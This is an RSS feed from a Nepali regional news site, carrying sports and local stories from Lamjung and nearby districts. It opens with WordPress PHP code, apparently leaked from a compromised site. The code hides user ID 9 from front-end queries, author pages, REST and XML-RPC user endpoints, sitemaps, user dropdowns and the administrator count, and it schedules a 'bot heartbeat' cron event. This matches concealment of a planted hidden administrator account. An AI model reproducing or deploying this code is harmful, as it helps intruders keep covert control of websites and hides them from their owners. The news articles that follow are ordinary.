add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 9;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 9 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 9;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 9;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 9;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 9;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
खेलकुद – Antaranga News || अन्तरङ्ग न्युज
https://www.antaranganews.com
News from Gandaki ProvinceSat, 18 Jul 2026 15:36:08 +0000en-US
hourly
1 https://wordpress.org/?v=7.0.2https://www.antaranganews.com/wp-content/uploads/2023/05/Ant-logo-150x95.jpgखेलकुद – Antaranga News || अन्तरङ्ग न्युज
https://www.antaranganews.com
3232चौथो कोरा– २०२६ ‘झरनादेखि झरनासम्म’ कार्यक्रमको हामखोेलामा समापन : फोटो फिचर
https://www.antaranganews.com/?p=50127
https://www.antaranganews.com/?p=50127#respondSat, 18 Jul 2026 15:29:35 +0000https://www.antaranganews.com/?p=50127बेसीशहर– लमजुङमा ‘झरनादेखि झरनासम्म कोरा– २०२६’ को चौथो कार्यक्रम सम्पन्न भएको छ । सो कार्यक्रम साइक्लिङ संघ लमजुङको सदरमुकाम बेसीशहर नगरपालिका– १ को आकाशे (गाईखुरे)झरनादेखि मस्र्याङ्दी गाउँपालिका– ८ को हामखोल झरनासम्म अगष्टको तेस्रो शनिबार साउन २ गते गरिएको हो ।
‘कोरा– २०२६’मा आठ महिलासमेत ६५ जना साइकल धावकले भाग लिएको आयोजकको भनाइ छ । सो कार्यक्रममा आठ वर्षका बालक प्रज्ञा गुरुङदेखि ६५ वर्षका जेष्ठ नागरिकले समेत भाग लिएका थिए ।
समापनमा सहभागी सबैलाई आयोजक संस्था साइक्लिङ संघ लमजुङका अध्यक्ष ध्रुवराम प्रधानले मेडल प्रदान गर्नु भएको थियो । त्यस्तै, एक जनालाई गोलाप्रथाद्वारा गरिएको अन्नपूर्ण गिफ्ट ह्याम्परबाट उपलब्ध गिफ्ट ह्याम्पर पनि प्रदान गरिएको थियो ।
समापन स्थल हामखोला झरनामा आयोजक संस्थाबाट पत्रकार सम्मेलन समेत गरी आउँदो भदौको तेस्रो साता अर्थात १९ गतेदेखि २१ गतेसम्म तीन दिने राष्ट्रव्यापी खुला ‘प्रथम टुर दि लमजुङ २०२६’हुने जानकारी दिइएको थियो । उक्त कार्यक्रमको फोटो फिचर :
]]>
https://www.antaranganews.com/?feed=rss2&p=501270मर्स्याङ्दी गाउँपालिकाका अध्यक्ष गुरुङलाई थप उपचारका लागि काठमाडौं रिफर
https://www.antaranganews.com/?p=50122
https://www.antaranganews.com/?p=50122#respondSat, 18 Jul 2026 12:13:03 +0000https://www.antaranganews.com/?p=50122खुदी(लमजुङ)– आफैले चलाएको गाडीबाट दुर्घटनामा पर्नु भएका लमजुङको मर्स्याङ्दी गाउँपालिकाका अध्यक्ष अर्जुन गुरुङलाई थप उपचारका लागि काठमाडौं रिफर गरिएको छ । सोही गाउँपालिका– ३ को सुरुङमार्ग नजिक जल्केनीमा साउन २ गते विहान उहाँ दुर्घटनामा पर्नु भएको हो ।
आज साउन २ गते साइक्लिङ सङ्घ लमजुङद्वारा ‘झरनादेखि झरनासम्म कोरा २०२६’ को कार्यक्रम चलिरहेको थियो । सो कार्यक्रमको क्षेत्र जिल्ला सदरमुकाम बेसीशहर नगरपालिका– १ को आकाशे (गाईखुरे)झरनादेखि मर्स्याङ्दी गाउँपालिका– ८ को हामखोल झरनासम्म निर्धारण थियो । ‘कोरा’ २०२६ को समापन स्थल हामखोला झरनामा ‘प्रथम टुर दि लमजुङ २०२६’ सम्बन्धी पत्रकार सम्मेलन समेतको कार्यक्रम राखिएको थियो ।
कार्यक्रमका सहभागी भएका साइकलयात्री र पत्रकारहरूको टोली गाईखुरे झरनाबाट साइकल यात्रा सुरु गरी बेसीशहर नगरपालिका– २, ३, ८, ७ र ६ नंबर वडा हुँदै मर्स्याङ्दी गाउँपालिकाको प्रवेश नाका वडानं. ९ मा सो गाउँपालिकाले हालै निर्माण गरेको स्वागतद्वारमा पुगेको थियो । त्यो खबर पाएर उक्त ‘कोरा’ कार्यक्रमका सहभागीहरूलाई खानेपानीद्वारा स्वागत गर्नका लागि अध्यक्ष गुरुङले आफै आउने खबर पठाउनु भई कार्यक्रम स्थलतर्फ आउँदै हुनुहुन्थ्यो ।
उहाँ पालिकाको ग १ झ ३३१ नम्बरको गाउँपालिकाको बोलेरो जिपमा खानेपानीका कार्टुन बोकेर आफैले गाडी हाँकेर कार्यक्रम स्थलमा आउँदै गर्दा मस्र्याङ्दी नदी किनारमा खसेर दुर्घटनामा पर्नु भएको प्रहरी भनाइ छ । उहाँ आफैले चलाइरहनु भएको गाडी सडकबाट करिब ६० मिटर तल खसेको थियो । सो दुर्घटनामा अध्यक्ष गुरुङ सामान्य घाइते (ढाडमा दुःखाई) हुनु भएको जानकारी आएको जिल्ला प्रहरी प्रमुख प्रहरी नायव उपरीक्षक जितेन्द्रकुमार बस्नेतले बताउनु भयो । उहाँका अनुसार जिपको अगाडिको सिटमा राखिएको पानीको कार्टुन कोल्टिएपछि त्यसलाई सम्हाल्ने क्रममा सवारी अनियन्त्रित भई सडकबाट तल खसेको प्रारम्भिक अनुसन्धानबाट खुलेको छ ।
उहाँले भन्नुभयो, ‘दुर्घटनापछि अध्यक्ष गुरुङलाई तत्कालै प्रदेश अस्पताल लमजुङ, बेसीशहरमा प्राथमिक उपचार गरिएको थियो । उपचारका क्रममा उहाँको ढाड र टाउकोमा दुखाइ देखिएकाले थप उपचारका लागि काठमाडौं गरिफर गरिएको हो ।’
अध्यक्ष गुरुङको स्वास्थ्य अवस्था सामान्य रहेको र दुर्घटनाबारे थप अनुसन्धान भइरहेको लमजुङ प्रहरीले जनाएको छ ।
]]>https://www.antaranganews.com/?feed=rss2&p=501220नेपाल मेडिकल कलेजमा दुई साताव्यापी च्यारिटी स्पोट्रर्स सुरु
https://www.antaranganews.com/?p=49985
https://www.antaranganews.com/?p=49985#respondSun, 12 Jul 2026 00:15:24 +0000https://www.antaranganews.com/?p=49985काठमाडौं– नेपाल मेडिकल कलेजमा आजदेखि १५ दिने च्यारिटी स्पोट्रर्स फेस्ट सुरु भएको छ । आयोजक कलेजका प्रबन्ध निर्देशक डा. सबिहा यासमिनले दुई सातासम्म हुने उक्त च्यारिटी स्पोट्र्स फेस्ट म्याराथुनको उद्घाटन गर्नुभएको हो ।
प्रबन्ध निर्देशक डा. यासमिनले सो अवसरमा विद्यार्थीहरूलाई शारीरिक र मानसिक रुपमा स्वस्थ राख्न खेलकूद महत्वपूर्ण रहेको बताउनु भयो । विद्यार्थीहरूमा अन्तरनिहीत प्रतिभा उजागर गर्न र उनीहरूको अध्यापन तथा अतिरिक्त क्रियाकलापमा सहयोग पुर्याउन कलेज प्रशासन सदैव साथ रहने उहाँले प्रतिबद्धता व्यक्त गर्नुभयो । उहाँले कार्यक्रमले विद्यार्थी, फ्याकल्टी, नर्स तथा कर्मचारीहरू विच सुमधुर सम्बन्ध स्थापित गर्न टेवा पुग्ने बताउनु भयो ।
विद्यार्थीमा अन्तरनिहीत प्रतिभा प्रस्फुटन गराउँदै आर्थिक अभावसँग जुधिरहेका बिरामीहरूलाई सहयोग जुटाउने उद्देश्यले च्यारिटी स्पोट्रर्स फेस्ट आयोजना गरिएको हो ।
म्याराथुनमा पुरूषतर्फ अजय क्षेत्री पहिलो, सुमन तामाङ दोश्रो र मनिष ऐर तेश्रो हुनुभयो । त्यस्तै, महिलातर्फ सन्ध्या पौडेल पहिलो रोशीका बैद्य र दर्शिता भण्डारीले क्रमशः दोश्रो र तेश्रो स्थान हासिल गर्नुभयो । उहाँहरूलाई कलेजकी प्रबन्ध निर्देशक डा. सबिहा यासमिनले मेडल तथा प्रमाणपत्र वितरण गर्नु भएको थियो ।
स्पोट्रर्स फेस्टमा फुटसल, बास्केटबल, भलिबल, ब्याडमिन्टन, टेबल टेनिस, चेस, म्याराथन, स्प्रिन्ट, डोरी तान्ने खेल, पब्जी लगायतका प्रतियोगिताहरू हुने स्वास्थ्य तर्फ हाम्रो प्रयासकी अध्यक्ष डा. असिमा गौतमले जानकारी दिनुभयो ।
कार्यक्रममा कलेजकी निर्देशक डा. नुसरत जहाँ अन्सारी, अस्पताल निर्देशक प्रा.डा. निलमणी उपाध्याय, फ्याकल्टी तथा विद्यार्थीहरूको सहभागीता रहेको थियो । स्वास्थ्यतर्फ हाम्रो प्रयास (OATh) सँगको सहकार्यमा भइरहेको च्यारिटी स्पोट्रर्स फेस्टमा एमविविएस, विडिएस, विएस्सी नर्सिङका विद्यार्थीहरू, फ्याकल्टी तथा स्टाफहरूको उल्लेखनीय सहभागीता छ ।
]]>https://www.antaranganews.com/?feed=rss2&p=499850महिला प्रहरी र पत्रकार महिलाबीच मैत्रीपूर्ण फुटसलमा बराबरी
https://www.antaranganews.com/?p=49660
https://www.antaranganews.com/?p=49660#respondFri, 26 Jun 2026 02:50:53 +0000https://www.antaranganews.com/?p=49660बेसीशहर– लमजुङमा महिला प्रहरी र पत्रकार महिलाबीच मैत्रीपूर्ण फुटसल प्रतियोगिता सम्पन्न भएको छ । ‘लागुऔषध दुरुपयोग एवम् ओसारपसार विरुद्ध सप्ताहव्यापी कार्यक्रम अन्र्तगत यहाँको आम्बोटे स्थित फुटसल हलमा सो मैत्रीपूर्ण खेलमा २÷२ गोलको बराबरी भएको हो ।
जिल्ला प्रहरी कार्यालय लमजुङको आयोजना, जिल्ला प्रशासन कार्यालयको सहयोग तथा पत्रकार महासंघ लमजुङ र सञ्चारिका समूहको समन्वयमा भएको मैत्रीपूर्ण फुटसल प्रतियोगितामा २–२ गोलको वरावरीसँगै खेल समापन भएको हो । खेल बराबरीमा टुंगिएको हुँदा जीत हार गरिएन पत्रकार महासंघकी उपाध्यक्ष बसन्ता भट्टले जानकारी दिनुभयो ।
उहाँका अनुसार प्रमुख जिल्ला अधिकारी कृष्णप्रसाद खनालले प्रमुख आतिथ्यतामा भएको कार्यक्रममा उहाँले खेलका सहभागीहरूलाई प्रमाणपत्र वितरण गर्नु भएको थियो । आफ्नो मन्तव्यका क्रममा उहाँले सम्पन्न मैत्रीपूर्ण फुटसल खेलले प्रहरी र सञ्चारकर्मी बीचको सम्बन्धलाई अझ सुदृढ बनाउने काम गरेको बताउनु भयो । उहाँले यो कार्यक्रमले लागुऔषध दुरुपयोग तथा ओसारपसारविरुद्ध जनचेतना अभिवृद्धि गर्न सहयोग पुग्ने बताउनुभयो । उहाँले स्वस्थ जीवनयापनका लागि खेलकुद उपयोगी रहेको भन्दै खेल गतिविधिमा सहभागीले युवाहरूलाई दुव्र्यसनबाट टाढा रहन मदत पुग्ने धारणा व्यक्त गर्नुभएको थियो ।
कार्यक्रममा जिल्ला प्रहरी कार्यालयका प्रमुख प्रहरी नायव उपरीक्षक जितेन्द्र कुमार बस्नेत, सशस्त्र प्रहरी बल नेपाल आश्रित गुल्म लमजुङका सशस्त्र प्रहरी नायव उपरीक्षक विकास अधिकारी, पत्रकार महासंघका जिल्ला अध्यक्ष सन्देश पौडेल सहितका पत्रकारहरू, स्थानीयवासी तथा प्रहरी कर्मचारीहरूको उपस्थिति रहेको थियो ।
]]>https://www.antaranganews.com/?feed=rss2&p=496600मर्स्याङदी गाउँपालिकाद्वारा फुटबल तथा भलिबलका २५ खेलाडी सम्मानित
https://www.antaranganews.com/?p=49634
https://www.antaranganews.com/?p=49634#respondThu, 25 Jun 2026 06:47:09 +0000https://www.antaranganews.com/?p=49634भूलभूले(लमजुङ)– लमजुङको मर्स्याङदी गाउँपालिकाले पालिका भित्रका २५ जना खेलाडीहरूलाई सम्मान गरेको छ । गाउँपालिकाले उक्त गाउँपालिकामा स्थायी बासिन्दा भई विभिन्न तहका प्रतियोगितामा उत्कृष्ट प्रदर्शन गर्दै आएका फुटबल तथा भलिबलका २५ जना खेलाडीहरूको प्रोत्साहनका लागि असार १५ गते सम्मान गरिएको हो ।
गाउँपालिका अध्यक्ष अर्जुन गुरुङको अध्यक्षतामा राष्ट्रकवि माधवप्रसाद घिमिरे सभाहलमा आयोजित कार्यक्रममा ती खेलाडीलाई सम्मान गरिएको हो । खेलाडीहरूलाई जुत्ता, जर्सी, ट्र्याकसुट, झोला, सक्स लगायतका खेल सामग्रीसँगै नगद रकम वितरण गरिएको थियो । कार्यक्रममा फुटबल र भलिबल विधाका २५ जना खेलाडीलाई खेल सामग्री तथा नगदसहित प्रोत्साहन प्रदान गरिएको गाउँपालिकाले जनाएको छ । चालु आवको स्विकृत कार्यक्रम अन्तरगत खेलाडीहरूलाई सम्मान गरिएको गाउँपालिका अध्यक्षका स्वकीय सचिव प्रदिप गुरुङले जानकारी दिनु भएको छ । उहाँका अनुसार प्रति खेलाडी नगद १०/१० हजार रुपैयाँ र १० हजार रुपैयाँ बराबरका सामग्रीहरू वितरण गरिएको हो । उनले भने, ‘महिला पुरुष गरी २५ जना सम्मानित भएकोमा, फुटबलमा पाँच जना महिला समेत १८ तथा भलिबलतर्फ महिला चार जना गरी सात जनालाई सम्मान गरिएको हो ।’
सो अवसरमा ती सामग्री वितरण पछि गाउँपालिकाका अध्यक्ष गुरुङले खेलकुद युवाहरूको क्षमता विकास, अनुशासन, नेतृत्व विकास तथा स्वस्थ समाज निर्माणको महत्वपूर्ण माध्यम भएको हुँदा खेलाडीहरूको हौसला अभिवृद्धि गर्न यो कार्यक्रम गरिएको हो भन्नुभयो । उहाँका अनुसार स्थानीय, जिल्ला, प्रदेश तथा राष्ट्रियस्तरका प्रतियोगितामा भाग लिएर आफ्नो उत्कृष्ट प्रतीभा प्रदर्शन गरेका खेलाडीहरूको योगदानको उच्च मूल्यांकन गर्दै सम्मान गरिएको हो । अध्यक्ष गुरुङले आगामी दिनमा पनि यस्ता कार्यक्रमलाई निरन्तरता दिइने प्रतिबद्धता व्यक्त गर्नु भयो ।
गाउँपालिकाले यस कार्यक्रमले खेलाडीहरूको मनोबल वृद्धि गर्नुका साथै खेलकुद क्षेत्रप्रति स्थानीय सरकारको प्रतिबद्धता झल्काएको रुपमा लिइएको छ ।
उक्त कार्यक्रममा जनप्रतिनिधि, कर्मचारी, जिल्ला तथा पालिका खेलकुद विकास समितिका पदाधिकारी, खेलाडीहरूका साथ खेलप्रेमीहरूको भारी संख्यामा उपस्थिति रहेको थियो ।
]]>https://www.antaranganews.com/?feed=rss2&p=496340जिल्लास्तरीय माध्यामिक विद्यालयस्तरीय छात्रछात्रा ब्याडमिन्टन प्रतियोगिता सम्पन्न
https://www.antaranganews.com/?p=49090
https://www.antaranganews.com/?p=49090#respondSun, 31 May 2026 03:18:32 +0000https://www.antaranganews.com/?p=49090बेसीशहर– लमजुङमा जिल्लास्तरीय माध्यामिक विद्यालयस्तरीय छात्र/छात्रा ब्याडमिन्टन प्रतियोगिता छुट्टाछुट्टै रुपमा सम्पन्न भएको छ । बेसीशहरको फिट्नेस कम्प्लेक्समा सञ्चालन भएको सो प्रतियोगिता लमजुङ एजुकेशन सेन्टर लमजुङ र सुभारू कन्सल्टेन्सी डुम्रे, तनहुँको आयोजनामा भएको हो ।
सदरमुकाम बेसीशहरमा सम्पन्न प्रतियोगितामा प्रतियोगितामा छात्रतर्फ युनिभर्सल एकेडेमीका उज्ज्वल थापा पहिलो भएका छन् । प्रतियोेगितामा अर्थली प्याराडाइजका दिप्सन श्रेष्ठ दोस्रो भएका छन् भने युनिभर्सल एकेडेमीकै सोवित गुरूङ तेस्रो र नितेश बस्नेत चौथो भएका छन् ।
पहिलो, दोस्रो र तेस्रो हुने प्रतियोगीहरूले क्रमशः छ हजार, चार हजार र दुई हजार रूपैंया नगद र प्रमाणपत्र पुरस्कार प्रदान गरिएको छ ।
त्यसैगरी, छात्रातर्फको प्रतियोगितामा विद्या विकास आ.मा.वि.की स्वस्तिका रावत पहिलो भएकी छन् । सोही विद्यालयकी सुप्रिया बोहोरा दोस्रो तथा अर्थली प्याराडाइज आमाविकी युना लामा तेस्रो भइन् भने भु.पू बोर्डिङ बेसीशहरकी एलोङ तामाङले सान्त्वना स्थान हासिल गरेकी छन् ।
पहिलो दोस्रो र तेस्रो हुने प्रतियोगीहरू छात्रछात्रा दुवैतर्फका खेलाडीलाई क्रमशः छ हजार, चार हजार र दुई हजार रूपैंया नगद, ट्रफि तथा प्रमाणपत्र पुरस्कार स्वरुप प्रदान गरिएको छ ।
सो प्रतियोगितामा छात्रतर्फ १८ तथा छात्रातर्फ १३ जना विद्यार्थीले भाग लिएको प्याब्सनका सदस्य उद्दव घिमिरेले बताउनु भयो । उहाँका अनुसार लमजुङ एजुकेशन सेन्टर लमजुङ तथा सुभारू कन्सल्टेन्सी डुम्रेका सञ्चालक कर्ण गुरूङको अध्यक्षता एवम् प्याब्सन लमजुङका अध्यक्ष ईश्वर पौडेलको प्रमुख आतिथ्यतामा उक्त कार्यक्रम भएको थियो । उहाँहरूले विजयी छात्रछात्रालाई संयुक्त रुपमा पुरस्कार र प्रमाणपत्र वितरण गर्नु भएको थियो ।
प्रमुख अतिथि पौडेलले पुरस्कार वितरणपछि यस्ता प्रतियोगिताले विद्यार्थीहरूमा अनुशासन, आत्मविश्वास र प्रतिस्पर्धी भावना विकास गर्न सहयोग पुग्ने विश्वास गर्दै विद्यालयस्तरबाटै खेल प्रतिभाको पहिचान, प्रोत्साहन आवश्यक रहेको बताउनु भयो । उहाँले खेलकुदले विद्यार्थीको शारीरिक तथा मानसिक विकासमा महत्वपूर्ण योगदान पु¥याउने उल्लेख गर्नु भएको थियो ।
प्रतियोगिताका विजेता तथा उत्कृट प्रदर्शन गर्ने विद्यार्थीहरूलाई नगद पुरस्कारका साथमा प्रमाण पत्र, ट्रफि प्रदान गरिएको अयोजक सुभारू कन्सल्टेन्सी गुरुङको भनाइ छ । उहाँका अनुसार विद्यार्थीहरूमा खेलप्रति रूची अभिवृद्धि गर्दै स्वस्थ प्रतिस्पर्धाको वातावरणको सृजना गर्ने उद्देश्यले प्रतियोगिता आयोजना गरिएको हो ।
]]>https://www.antaranganews.com/?feed=rss2&p=490900२५ औं शुकमान स्मृति कप खुला पुरुष तथा महिला फुटबल प्रतियोगिता जारी
https://www.antaranganews.com/?p=49074
https://www.antaranganews.com/?p=49074#respondSat, 30 May 2026 10:11:37 +0000https://www.antaranganews.com/?p=49074ढँगै(लमजुङ)– २५ औं शुकमान स्मृति रनिङ कप खुला पुरुष तथा महिला फुटबल प्रतियोगिताको दोस्रो चरणका खेल सुरु भएको छ । शुकमान गुरुङ स्मृति कप ट ‘ब्’ साइड खुला पुरुष तथा महिला फुटबल प्रतियोगिता– २०८३ स्थानीय मनास्लु युवा क्लबको आयोजना गरेको हो । मर्स्याङ्दी गाउँपालिका– ३ को यहाँ जेठ १६ गते तेस्रो दिनको पहिलो खेल सुरु भएको छ ।
प्रतियोगिताको पहिलो दिन एक खेल भएको थियो भने दोस्रो दिनमा चार खेल सम्पन्न भएको थिए । आज विहान पानी परेको कारणले खेल प्रभावित भएको थियो । आजको पहिलो खेल जारी रहेको आयोजक संस्थाका सचिव पूर्ण गुरुङले बताउनु भयो । उहाँका अनुसार प्रतियोगितामा पुरुषतर्फ २६ र महिलातर्फको खेल सुरु हुन बाँकी रहेको छ ।
प्रतियोगितामा पहिलो हुने टिमलाई पुरुषतर्फ एक लाख रुपैयाँ, शुकमान स्मृति रनिङ कप, मेडल र प्रमाणपत्र पुरस्कार रहेको छ । त्यस्तै दोस्रो हुने टिमलाई ६० हजार नगद, मेडल र प्रमाणपत्र रहेको छ । सर्वाधिक गोलकर्ता र उत्कृष्ठ खेलाडी एक एक जनालाई दुई हजार पाँच सय नगद, मेडल र प्रमाणपत्र पुरस्कार रहेको छ ।
त्यस्तै महिलातर्फ पहिलो हुने टिमलाई २० हजार नगद शुकमान स्मृति कम, मेडल र प्रमाणपत्र रहेको छ भने दोस्रो हुने टिमलाई १२ हजार नगद, मेडल र प्रमाणपत्र पुरस्कार रहेको छ । त्यस्तै, सर्वाधिक गोलकर्ता र उत्कृष्ठ खेलाडी एक एक जनालाई एक हजार नगद, कप मेडल र प्रमाणपत्र पुरस्कार रहेको छ ।
‘एकता, अनुशासन र सम्मान— शहीद सुकमान स्मृति कपको पहिचान’ भन्ने मूल नाराका साथ आयोजित सो प्रतियोगिता संविधान सभा सदस्य जमिन्द्रमान घलेको प्रमुख आतिथ्यता तथा मर्स्याङ्दी गाउँपालिका अध्यक्ष अर्जुन गुरूङको विशेष आतिथ्यता रहेको थियो ।
समुद्घाटन कार्यक्रम आयोजक क्लबका अध्यक्ष योज बहादुर गुरूङको अध्यक्षता मर्स्याङ्दी गाउँपालिका– ३, ढगैं, लमजुङमा जारी रहेको छ ।
तत्कालीन खुदी गाउँ विकास समितिका अध्यक्षसमेत रहेका शुकमान गुरुङको त्यो बेलाको बहुचर्चित लाउडा भ्रष्टाचार काण्डविरुद्धमा एमालेले जिल्ला सदरमुकाम बेसीशहरमा आयोजना गरेको प्रदर्शनमा ज्यान गएको थियो । स्व. गुरुङलाई एमालेले शहीद घोषणा गरेको छ । उनै योद्धा शुकमान गुरुङको योगदानको स्मृतिमा २५औँ वार्षिक पुण्यतिथिमा प्रतियोगिताको आयोजना गरिएको आयोजकको भनाइ छ ।
]]>https://www.antaranganews.com/?feed=rss2&p=490740याक अट्याक २०२६ को टोली आज मनाङमा विश्रमा गर्दै
https://www.antaranganews.com/?p=49032
https://www.antaranganews.com/?p=49032#respondWed, 27 May 2026 13:36:42 +0000https://www.antaranganews.com/?p=49032चामे(मनाङ)– ‘याक अट्याक– २०२६’को प्रतिस्पर्धामा सहभागी भएको टोली आज चौथो दिन जेठ १३ गते माथिल्लो मनाङमा पुगेर विश्राम गरिहरेको छ । सो प्रतियोगिताको माउन्टेन बाइकिङ वल्र्ड वाइड प्रालि नेपालले व्यवस्थापन गरेको हो ।
लमजुङको जिल्ला सदरमुकाम बेसीशहरबाट चक्रीय अन्नपूर्ण पदमार्गमा सो प्रतिस्पर्धा सुरु भएको हो । यो ‘याक अट्याक’को १८औं संस्करण हो । नेपाललाई अन्तर्राष्ट्रिय साहसिक पर्यटनको गन्तव्यका रूपमा स्थापित गर्ने उद्देश्यले सो प्रतियोगिता माउन्टेन बाइकिङ वल्र्ड वाइड लिमिटेड बेलायतको आयोजनामा भएको हो ।
विश्वकै कठिन र उच्च क्षेत्रमा आयोजना हुने सो प्रतियोगिता माउन्टेन बाइक रेसमध्ये चर्चित मानिन्छ । उक्त प्रतियोगितामा ११ देशका २८ जना साइकल धावक सहभागी भएको आयोजकको भनाइ छ । प्रतियोगितामा २१ विदेशी र ७ नेपाली साइकल धावक सहभागी छन् ।
प्रतियोगिताको पहिलो दिन लमजुङको बेसीशहर नगरपालिका– ८ बाट सुरु भई सोही पालिका– ६ को पुमागाउँ, क्ब्होलासोथर गाउँपालिका– १ को बाग्लुङपानी– नजरे हुँदै बेसीशहर नगरपालिका– ६ को चण्डीस्थान, मकैडाँडा झरेर पुनः बेसीशहर नगरपालिका– ८ को बेसीशहरसम्म करिब ३० किलोमिटर दूरी पार गरेका छन् ।
सो टोली दोस्रो दिन यहाँ अर्थात मनाङ जिल्लाको सदरमुकाम चामेमा आइपुगेको थियो । तेस्रो दिनमा माथिल्लो मनाङ पुगेको सो टोली त्यहाँ आराम गरिरहेको छ ।
उक्त बहुदिवसीय प्रतियोगितामा सहभागी विदेशी धावकमध्ये भारतका ५ पुरुष खेलाडी छन् । प्रतियोगितामा ६० वर्षमाथिका २ जना विदेशी छन् । सो प्रतिस्पर्धामा विदेशी महिला ३ जना र नेपाली महिला खेलाडी एक जना छन् । ती सहभागीहरू भारत, आयरल्यान्ड, जर्मनी, बेलायत, अस्ट्रिया, ब्राजिल, स्विडेन, इजरायल र स्पेनबाट आएको प्रतियोगिता व्यवस्थापक अजय पण्डित क्षेत्रीले बताउनु भयो । उहाँका अनुसार प्रतियोगितामा गत वर्षका विजेता खुसीमान घर्तीमगर तथा धुलिखेल अस्पतालका डाक्टर विकास पराजुलीले पनि भाग लिनु भएको छ । उहाँले भन्नुभयो, ‘हामीहरूको टोली चक्रीय पदमार्ग हुँदै हिमाली जिल्ला मनाङमा भोलिसम्म रहने छ ।’ निर्धारित कार्यक्रम अनुसार भोलि थोराङ फेदीमा बास बस्ने उहाँको भनाइ छ ।
पाँचौं दिन थोराङ्ला फेदी हुँदै छैटौं दिन विश्वकै अग्लो हिमाली भञ्ज्याङमध्ये एक मानिने ५ हजार ४ सय १६ मिटर उचाइको थोराङ्ला पार गरेर मुस्ताङको कागबेनी झर्ने योजना रहेको प्रतियोगिता व्यवस्थापक पण्डित क्षेत्रीले जानकारी दिनु भयो । उहाँका अनुसार सातौं दिन कालोपानीमा पुगेर प्रतियोगिता सकिनेछ ।
समापन कार्यक्रम मे ३१ (जेठ १७ गते) का दिन पोखरामा आयोजना गरिने रेक ओ–अर्डिनेटर ज्ञानेन्द्र स्थापितले उल्लेख गर्नु भयो । उहाँले भन्नुभयो, ‘प्रतियोगितामा पुरुष तथा महिलातर्फ प्रथम हुनेले ७५ हजार, द्वितीयले ५० हजार र तृतीयले २० हजार रुपैयाँ पुरस्कार प्रदान गर्ने कार्यक्रम रहेको छ ।’
]]>https://www.antaranganews.com/?feed=rss2&p=490320लमजुङ सेवा समिति हङकङको अध्यक्ष पदमा श्याम पुनः सर्वसम्मत चयन
https://www.antaranganews.com/?p=48426
https://www.antaranganews.com/?p=48426#respondSun, 26 Apr 2026 02:00:03 +0000https://www.antaranganews.com/?p=48426हङकङ– यहाँ बस्नु हुने लमजुङबासीका साथै जन्म जिल्लाको सेवा र विकास लागि साझा संस्थाका रुपमा स्थापित लमजुङ सेवा समिति हङकङको अध्यक्ष पदमा श्याम कुमार गुरुङ पुनः सर्वसम्मत रुपमा निर्वाचित हुनुभएको छ । समितिको १३ औ अधिवेशनबाट गुरुङको अध्यक्षतामा नयाँ कार्यसमिति बैशाख १३ गते निर्विरोध रुपमा चयन भएको हो ।
समितिको उपाध्यक्षमा जगत प्रसाद गुरुङ, सचिवमा गमन घले, सहसचिव सन्तोष गुरुङ, कोषाध्यक्षमा मिन बहादुर गुरुङ, सहकोषाध्यक्षमा पञ्चमान गुरुङ चयन हुनु भएको छ । समितिको सदस्यहरूमा रेवती गुरुङ, कल्पना घले, पुष्पादेवी गुरुङ, ओमकला गुरुङ, पेमा गुरुङ, अमृत गुरुङ, मेनुका गुरुङ, सुनिता गुरुङ, वुद्धि प्रसाद गुरुङ, हर्क वहादुर गुरुङ बेल बहादुर गुरुङ, इन्द्र कमुार गुरुङ, नरेश गुरुङ, निशा गुरुङ, सीता गुरुङ, प्रज्ञा गुरुङ, कविता गुरुङ, प्रितम गुरुङ र किशोर गुरुङ चयन हुनु भएको छ । समिति २५ सदस्यीय रहेको छ ।
